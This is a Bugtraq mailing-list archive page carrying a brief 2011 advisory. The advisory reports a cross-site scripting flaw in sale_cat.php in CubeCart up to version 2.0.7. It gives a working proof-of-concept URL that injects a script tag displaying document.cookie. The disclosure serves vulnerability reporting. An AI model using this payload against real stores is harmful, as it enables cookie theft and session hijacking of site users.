Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

XSS in CubeCart <= 2.0.7

From: Michele Spagnuolo <mikispag () gmail com>
Date: Sun, 6 Mar 2011 21:41:22 +0100
CubeCart (http://www.cubecart.com) up to version 2.0.7 inclusive are vulnerable to a XSS in sale_cat.php.

http://www.example.com/storedirectory/sale_cat.php/";;<script>alert(document.cookie)</script>
Previous By Date Next
Previous By Thread Next

Current thread: